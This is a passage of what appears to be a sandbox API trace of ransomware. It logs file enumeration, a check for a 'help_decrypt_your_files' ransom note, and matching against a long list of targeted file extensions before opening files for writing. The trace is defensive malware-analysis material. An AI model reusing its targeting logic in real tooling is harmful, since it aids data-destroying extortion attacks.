p4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.732] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x0, dwReserved1=0x0, cFileName="sync.ico", cAlternateFileName="")) returned 1
	[0167.732] lstrcmpW (lpString1="sync.ico", lpString2="..") returned 1
	[0167.732] lstrcmpW (lpString1="sync.ico", lpString2=".") returned 1
	[0167.732] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.732] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="sync.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"
	[0167.733] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 94
	[0167.733] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.733] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", cchLength=0x5e | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 0x5e
	[0167.733] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.733] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.733] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"
	[0167.733] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 94
	[0167.733] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.734] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.734] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.745] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.745] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.745] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2aff, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 1
	[0167.745] lstrcmpW (lpString1="tasks.xml", lpString2="..") returned 1
	[0167.745] lstrcmpW (lpString1="tasks.xml", lpString2=".") returned 1
	[0167.745] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.746] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="tasks.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"
	[0167.746] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 95
	[0167.746] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.746] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", cchLength=0x5f | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 0x5f
	[0167.746] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.746] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.746] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"
	[0167.746] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 95
	[0167.747] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.747] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.747] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0167.747] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.747] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.748] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.748] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.748] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.749] CloseHandle (hObject=0xffffffff) returned 1
	[0167.750] CloseHandle (hObject=0xffffffff) returned 1
	[0167.750] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmp.ico", cAlternateFileName="")) returned 1
	[0167.750] lstrcmpW (lpString1="wmp.ico", lpString2="..") returned 1
	[0167.751] lstrcmpW (lpString1="wmp.ico", lpString2=".") returned 1
	[0167.751] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.751] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="wmp.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"
	[0167.751] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 93
	[0167.751] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.751] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", cchLength=0x5d | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 0x5d
	[0167.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
